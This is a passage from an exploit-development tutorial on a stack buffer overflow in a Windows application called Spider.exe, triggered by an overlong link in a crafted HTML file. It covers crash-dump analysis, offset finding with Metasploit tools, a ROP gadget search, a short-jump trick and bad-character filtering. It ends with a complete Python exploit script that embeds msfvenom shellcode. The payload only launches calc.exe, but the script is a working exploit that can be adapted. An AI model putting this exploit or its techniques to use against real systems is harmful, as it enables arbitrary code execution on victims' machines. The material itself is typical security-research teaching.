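        "",
    ]
    return "\r\n".join(lines)


# "Spider.exe" as subkey name is an assumption based on the file name.
reg_text = build_reg_file("Spider.exe")
```

Saving reg_text to a file and importing it requires administrator rights. Without a DumpFolder value the dumps should end up in the default CrashDumps folder mentioned in the next paragraph.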

Now if the app crashes, a memory dump gets created in %HOMEPATH%\AppData\Local\CrashDumps. The dumps can be analyzed with Microsoft's WinDbg tool: https://learn.microsoft.com/en-us/windows-hardware/drivers/debugger/debugger-download-tools The following screenshot shows the overflow too.

Key in Registry
Crashdump in WinDBG

What is interesting now is that the application does not stop immediately at the first EXCEPTION_ACCESS_VIOLATION. Probably only the DLL crashes: execution returns to Spider.exe and crashes a second time, and a second crash dump gets created.

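The second crash happens because, back in the Spider.exe process, this cheeky little piece of code wants to be executed. Judging by the 77D88A8C address and the fs:[0] accesses, it probably belongs to the system's exception handling rather than to Spider.exe's own code: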

    77D88A8C | 55                       | push ebp                     
    77D88A8D | 8BEC                     | mov ebp,esp                  
    77D88A8F | FF75 0C                  | push dword ptr ss:[ebp+C]    
    77D88A92 | 52                       | push edx                     
    77D88A93 | 64:FF35 00000000         | push dword ptr fs:[0]        
    77D88A9A | 64:8925 00000000         | mov dword ptr fs:[0],esp     
    77D88AA1 | FF75 14                  | push dword ptr ss:[ebp+14]   
    77D88AA4 | FF75 10                  | push dword ptr ss:[ebp+10]   
    77D88AA7 | FF75 0C                  | push dword ptr ss:[ebp+C]    
    77D88AAA | FF75 08                  | push dword ptr ss:[ebp+8]    
    77D88AAD | 8B4D 18                  | mov ecx,dword ptr ss:[ebp+18]
    77D88AB0 | FFD1                     | call ecx                     

The second-to-last instruction loads 41414141 into ECX and the final call instruction tries to execute code there. This means EIP is now 41414141 and we directly control the execution flow.

What a lucky shot!!!

EIP gets overwritten with 41414141
    Crafting the Exploit

To craft a fully working exploit we need to find the right offset at which to inject our shellcode. For this we can use Metasploit's pattern_create, a tool that creates a string of a given length with a unique, non-repeating pattern. After the crash, EIP holds a small but recognisable part of that pattern. Searching for this part in the original pattern yields the exact offset at which the buffer overwrites the value that ends up in EIP.

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 10000

The generated HTML looks like the following. Note the first line <a -- around 260 spaces -- href="dummy"></a> is necessary for the overflow to work.

<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Test</title>
</head>
<body>

    <a                                                                                                                                                                                                                                                                        href="dummy"></a>
    <a href="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1

Another look at the crash dump shows which four pattern bytes landed in EIP. pattern_offset translates them into the exact byte offset:

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 6b43356b
[*] Exact match at offset 1876
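For readers without Metasploit at hand, the same lookup can be sketched in a few lines of Python. This is a minimal re-implementation of the "Aa0Aa1Aa2..." pattern idea, not Metasploit's own code; the function names are made up for this example.

```python
import string
import struct


def pattern_create(length):
    """Build an 'Aa0Aa1Aa2...' style cyclic pattern of the requested length."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length].encode("ascii")
    raise ValueError("length exceeds the 20280 unique bytes of this pattern")


def pattern_offset(register_value, length=10000):
    """Find where the four bytes seen in a register occur in the pattern."""
    # x86 is little-endian, so the register value is byte-reversed in memory.
    needle = struct.pack("<I", register_value)
    return pattern_create(length).find(needle)


offset = pattern_offset(0x6B43356B)
```

The value 6b43356b corresponds to the bytes "k5Ck" in memory, and looking them up in a 10000 byte pattern gives the same offset 1876 that pattern_offset.rb reports above.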

Let's confirm that by writing CCCC (43434343) to EIP. It works perfectly, as the crash dump shows:

This dump file has an exception of interest stored in it.
The stored exception information can be accessed via .ecxr.
(3574.1580): Access violation - code c0000005 (first/second chance not available)
For analysis of this file, run !analyze -v
eax=00000000 ebx=00000000 ecx=43434343 edx=77d88ad0 esi=00000000 edi=00000000
eip=43434343 esp=000a16d0 ebp=000a16f0 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
43434343 ??              ???

Now we just need to jump to somewhere we can write to. Unfortunately the stack addresses begin with a null byte, for example 0019F6C8, which lies directly behind the overflow offset. This means we cannot simply write this address to EIP, so we have to get a little bit creative.

At the moment the call ECX instruction gets executed, there are a few stack addresses on the stack. One of them can possibly be used for the exploit: 0019F6C0. It is the second address on the stack at this point.

Stack address to return to

This means we need a gadget that pops two registers and then returns. The first pop removes the return address that was pushed by the call ECX, the second pop removes the value behind it, and the ret then returns to the third value, which points into memory we control, right before the overflow offset. The gadget's address must not contain a null byte either.
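The effect of such a gadget can be modelled with a tiny Python sketch. The stack is represented as a list with the top element first. The return address follows from the listing above (the two-byte call ecx at 77D88AB0), 0019F6C0 is the address named in this article, and the middle slot is a placeholder because its real value is not given here.

```python
def pop_pop_ret(stack):
    """Model 'pop esi ; pop edi ; ret' on a stack given top-first as a list."""
    stack = list(stack)
    esi = stack.pop(0)  # discards the return address pushed by 'call ecx'
    edi = stack.pop(0)  # discards the next stack slot
    eip = stack.pop(0)  # 'ret' loads the third slot into EIP
    return esi, edi, eip


RETURN_AFTER_CALL = 0x77D88AB0 + 2  # 'call ecx' (FF D1) is two bytes long
UNKNOWN_SLOT = 0xDEADBEEF           # placeholder, real value not shown in the article
CONTROLLED_PTR = 0x0019F6C0         # stack address named in the article

_, _, new_eip = pop_pop_ret([RETURN_AFTER_CALL, UNKNOWN_SLOT, CONTROLLED_PTR])
```

In this model new_eip ends up as 0019F6C0, which is 8 bytes below 0019F6C8, the address directly behind the overflow offset.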

To search for a suitable gadget we can use the ROPgadget tool:

└─$ ROPgadget --binary MSVCRTD.DLL --depth 5 --console
(ROPgadget)> load
[+] Loading gadgets, please wait...
[+] Gadgets loaded !
(ROPgadget)> search pop ; pop ; ret
[...]
0x10217b07 : pop esi ; pop edi ; ret

It seems we have found a candidate in MSVCRTD.DLL. Instead of CCCC we can now write \x07\x7b\x21\x10 at the offset.
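The byte order and the null byte problem can be double-checked with a short Python sketch. The helper names are invented for this example; the two addresses are the ones from this article.

```python
import struct


def pack_addr(addr):
    """Return a 32-bit address in little-endian byte order, as it lies in memory."""
    return struct.pack("<I", addr)


def has_null_byte(addr):
    """True if the packed address contains a 0x00 byte."""
    return b"\x00" in pack_addr(addr)


stack_addr = pack_addr(0x0019F6C8)  # contains a null byte, unusable in the link
gadget = pack_addr(0x10217B07)      # pop esi ; pop edi ; ret in MSVCRTD.DLL
```

Here gadget is exactly the byte string \x07\x7b\x21\x10 used in the exploit, while the packed stack address ends in \x00.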

But now we jump to an address 4 bytes before the EIP overwrite. That is not nearly enough space for the shellcode, so we need another little trick to jump a few bytes further. To quickly experiment with (assemble / disassemble) ASM instructions this website can be helpful: https://defuse.ca/online-x86-assembler.htm#disassembly2

After some research I found this website: https://thestarman.pcministry.com/asm/2bytejumps.htm which discusses two-byte JMP instructions. In the end we just need the short jump opcode (eb) plus a one-byte displacement, counted from the end of the jump instruction. In our case the necessary bytes are eb 04, which skip the four bytes of the gadget address.

Let's place \x90\x90\xeb\x04 right before the gadget address. To write raw bytes to a file we can use Python.

import sys
sys.stdout.buffer.write(b"\x90\x90")
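How the two jump bytes come about can be sketched as follows. The helper short_jmp is a made-up name for this example. It encodes a forward short jump whose displacement is counted from the end of the two-byte instruction, so skipping the four bytes of the gadget address gives eb 04, the bytes that appear in the exploit scripts in this article.

```python
def short_jmp(skip):
    """Encode 'jmp short' that skips `skip` bytes after the 2-byte instruction."""
    if not 0 <= skip <= 0x7F:
        raise ValueError("forward short jumps reach at most 127 bytes")
    return bytes([0xEB, skip])


GADGET_LEN = 4  # size of the address that has to be jumped over

# Two NOPs as padding, then the jump: four bytes placed right before the gadget.
pre_gadget = b"\x90\x90" + short_jmp(GADGET_LEN)
```

The two NOPs only pad the jump to four bytes so that the gadget address stays at offset 1876.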

At the moment our exploit looks like this:

import sys

pre = b"""<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Test</title>
</head>
<body>

"""
pre += b"<a"

# It is unclear why exactly, but a link is needed before the
# one that overflows the buffer, and it has to contain
# at least 252 spaces for the exploit to work
pre += b" "*252
pre += b"href=\"dummy\"></a>\""

link = b"<a href=\""
link += b"A"*1872

# short jump forward over the gadget address
link += b"\x90\x90\xeb\x04" 

# jump to rop gadget in MSVCRTD.DLL
# 0x10217b07 : pop esi ; pop edi ; ret
link += b"\x07\x7b\x21\x10"

# NOP buffer followed by an INT3 breakpoint (0xCC) to stop in the debugger
link += b"\x90\x90\x90\x90\xCC"

# this padding is also needed for the exploit to work (remember the first crash in the DLL)
link += b"A"*2000

link += b"\"></a>"

post = b"""
</body>
</html>
"""

html = pre + link + post

sys.stdout.buffer.write(html)

Let's try it:

Works like a charm

Time to place the shellcode. To generate it we simply use the classic msfvenom pop-calc method. Let's also directly exclude null bytes and choose the C output format so the bytes can be pasted into our exploit script.

└─$ msfvenom -a x86 -p windows/exec cmd=calc.exe -b "\x00" -f c
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 220 (iteration=0)
x86/shikata_ga_nai chosen with final size 220
Payload size: 220 bytes
Final size of c file: 952 bytes
unsigned char buf[] = 
"\xbe\xfa\xf5\xdc\xb1\xdd\xc2\xd9\x74\x24\xf4\x5d\x29\xc9"
"\xb1\x31\x83\xed\xfc\x31\x75\x0f\x03\x75\xf5\x17\x29\x4d"
"\xe1\x5a\xd2\xae\xf1\x3a\x5a\x4b\xc0\x7a\x38\x1f\x72\x4b"
"\x4a\x4d\x7e\x20\x1e\x66\xf5\x44\xb7\x89\xbe\xe3\xe1\xa4"
"\x3f\x5f\xd1\xa7\xc3\xa2\x06\x08\xfa\x6c\x5b\x49\x3b\x90"
"\x96\x1b\x94\xde\x05\x8c\x91\xab\x95\x27\xe9\x3a\x9e\xd4"
"\xb9\x3d\x8f\x4a\xb2\x67\x0f\x6c\x17\x1c\x06\x76\x74\x19"
"\xd0\x0d\x4e\xd5\xe3\xc7\x9f\x16\x4f\x26\x10\xe5\x91\x6e"
"\x96\x16\xe4\x86\xe5\xab\xff\x5c\x94\x77\x75\x47\x3e\xf3"
"\x2d\xa3\xbf\xd0\xa8\x20\xb3\x9d\xbf\x6f\xd7\x20\x13\x04"
"\xe3\xa9\x92\xcb\x62\xe9\xb0\xcf\x2f\xa9\xd9\x56\x95\x1c"
"\xe5\x89\x76\xc0\x43\xc1\x9a\x15\xfe\x88\xf0\xe8\x8c\xb6"
"\xb6\xeb\x8e\xb8\xe6\x83\xbf\x33\x69\xd3\x3f\x96\xce\x2b"
"\x0a\xbb\x66\xa4\xd3\x29\x3b\xa9\xe3\x87\x7f\xd4\x67\x22"
"\xff\x23\x77\x47\xfa\x68\x3f\xbb\x76\xe0\xaa\xbb\x25\x01"
"\xff\xdf\xa8\x91\x63\x0e\x4f\x12\x01\x4e";

Unfortunately that doesn't work...

In the debugger it looks like the shellcode gets destroyed. The application overwrites the buffer during execution again.

After a bit of trial and error I found the solution. Since the program expects to parse a link, all URL and HTML metacharacters are bad. The shellcode breaks if it contains bytes that translate to, for example, these ASCII characters: " # ' ? > as well as line breaks (0d or 0a).

To get all bad chars we can just create all possible hex values and use them as shellcode. Then inspect the buffer and remove the bad chars. Unfortunately, this is a somewhat manual and annoying process.

b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
b"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
b"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
b"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
b"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
b"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
b"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
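The manual loop of sending, inspecting and removing can be sketched in Python. In the real workflow the "observed" bytes have to be copied out of the debugger by hand. In this sketch that step is replaced by a stand-in function, fake_parser, which simply cuts the buffer at the first delimiter. Both the function and its delimiter set are assumptions for demonstration and not the behaviour of Spider.exe.

```python
def first_bad_char(sent, observed):
    """Return the first byte of `sent` that is missing or altered in `observed`."""
    for i, b in enumerate(sent):
        if i >= len(observed) or observed[i] != b:
            return b
    return None


def collect_bad_chars(roundtrip, candidates=bytes(range(1, 256))):
    """Repeat the test, dropping the first mangled byte each round.

    `roundtrip` stands in for: put the bytes into the link, crash the
    target, read the buffer back from the debugger.
    """
    bad = []
    remaining = bytes(candidates)
    while True:
        b = first_bad_char(remaining, roundtrip(remaining))
        if b is None:
            return bad
        bad.append(b)
        remaining = remaining.replace(bytes([b]), b"")


def fake_parser(data, delimiters=b'\n\r"#\'>?'):
    """Hypothetical target: truncates the buffer at the first delimiter byte."""
    for i, b in enumerate(data):
        if b in delimiters:
            return data[:i]
    return data


bad = collect_bad_chars(fake_parser)
```

Against the real program every round still means a new crash and a new look at the memory, so the sketch mainly documents the bookkeeping.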

But in the end we come up with this:

└─$ msfvenom -a x86 -p windows/exec cmd=calc.exe -b "\x00\xff\x0a\x0d\x22\x23\x27\x3e\x3f" -f c
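Before pasting generated shellcode into the exploit, it can be checked against the excluded bytes with a small Python sketch. The helper name is made up for this example. The two test rows are copied from this article: one row of the first msfvenom output above and the first row of the shellcode in the final exploit.

```python
# Bytes passed to msfvenom via -b in the command above.
BAD_CHARS = bytes.fromhex("00ff0a0d2223273e3f")


def offending_bytes(payload, bad=BAD_CHARS):
    """Return (offset, byte) pairs for every bad character in the payload."""
    return [(i, b) for i, b in enumerate(payload) if b in bad]


# One row of the first attempt, which was generated with only -b "\x00".
first_try_row = b"\x3f\x5f\xd1\xa7\xc3\xa2\x06\x08\xfa\x6c\x5b\x49\x3b\x90"
# First row of the shellcode used in the final exploit.
final_row = b"\xdb\xdb\xba\x60\xe1\xe5\x4b\xd9\x74\x24\xf4\x58\x29\xc9"

first_try_hits = offending_bytes(first_try_row)
final_hits = offending_bytes(final_row)
```

The row from the first attempt starts with 0x3f, the question mark, which fits the observation that the first shellcode got destroyed.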

The final exploit looks like this:

import sys

pre = b"""<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Test</title>
</head>
<body>

"""
pre += b"<a"

# It is unclear why exactly, but a link is needed before the
# one that overflows the buffer, and it has to contain
# at least 252 spaces for the exploit to work
pre += b" "*252
pre += b"href=\"dummy\"></a>\""

link = b"<a href=\""
link += b"A"*1872

# short jump forward over the gadget address
link += b"\x90\x90\xeb\x04" 

# jump to rop gadget in MSVCRTD.DLL
# 0x10217b07 : pop esi ; pop edi ; ret
link += b"\x07\x7b\x21\x10"

# nop buffer
link += b"\x90\x90\x90\x90"

# shellcode
# bad chars excluded via msfvenom -b: 00 ff 0a 0d 22 23 27 3e 3f

link += b"\xdb\xdb\xba\x60\xe1\xe5\x4b\xd9\x74\x24\xf4\x58\x29\xc9"
link += b"\xb1\x31\x31\x50\x18\x83\xe8\xfc\x03\x50\x74\x03\x10\xb7"
link += b"\x9c\x41\xdb\x48\x5c\x26\x55\xad\x6d\x66\x01\xa5\xdd\x56"
link += b"\x41\xeb\xd1\x1d\x07\x18\x62\x53\x80\x2f\xc3\xde\xf6\x1e"
link += b"\xd4\x73\xca\x01\x56\x8e\x1f\xe2\x67\x41\x52\xe3\xa0\xbc"
link += b"\x9f\xb1\x79\xca\x32\x26\x0e\x86\x8e\xcd\x5c\x06\x97\x32"
link += b"\x14\x29\xb6\xe4\x2f\x70\x18\x06\xfc\x08\x11\x10\xe1\x35"
link += b"\xeb\xab\xd1\xc2\xea\x7d\x28\x2a\x40\x40\x85\xd9\x98\x84"
link += b"\x21\x02\xef\xfc\x52\xbf\xe8\x3a\x29\x1b\x7c\xd9\x89\xe8"
link += b"\x26\x05\x28\x3c\xb0\xce\x26\x89\xb6\x89\x2a\x0c\x1a\xa2"
link += b"\x56\x85\x9d\x65\xdf\xdd\xb9\xa1\x84\x86\xa0\xf0\x60\x68"
link += b"\xdc\xe3\xcb\xd5\x78\x6f\xe1\x02\xf1\x32\x6f\xd4\x87\x48"
link += b"\xdd\xd6\x97\x52\x71\xbf\xa6\xd9\x1e\xb8\x36\x08\x5b\x36"
link += b"\x7d\x11\xcd\xdf\xd8\xc3\x4c\x82\xda\x39\x92\xbb\x58\xc8"
link += b"\x6a\x38\x40\xb9\x6f\x04\xc6\x51\x1d\x15\xa3\x55\xb2\x16"
link += b"\xe6\x35\x55\x85\x6a\x94\xf0\x2d\x08\xe8"

# nop buffer
link += b"\x90\x90\x90\x90"

# this padding is also needed for the exploit to work (remember the first crash in the DLL)
link += b"A"*1500

link += b"\"></a>"

post = b"""
</body>
</html>
"""

html = pre + link + post

sys.stdout.buffer.write(html)

Let's see it in action: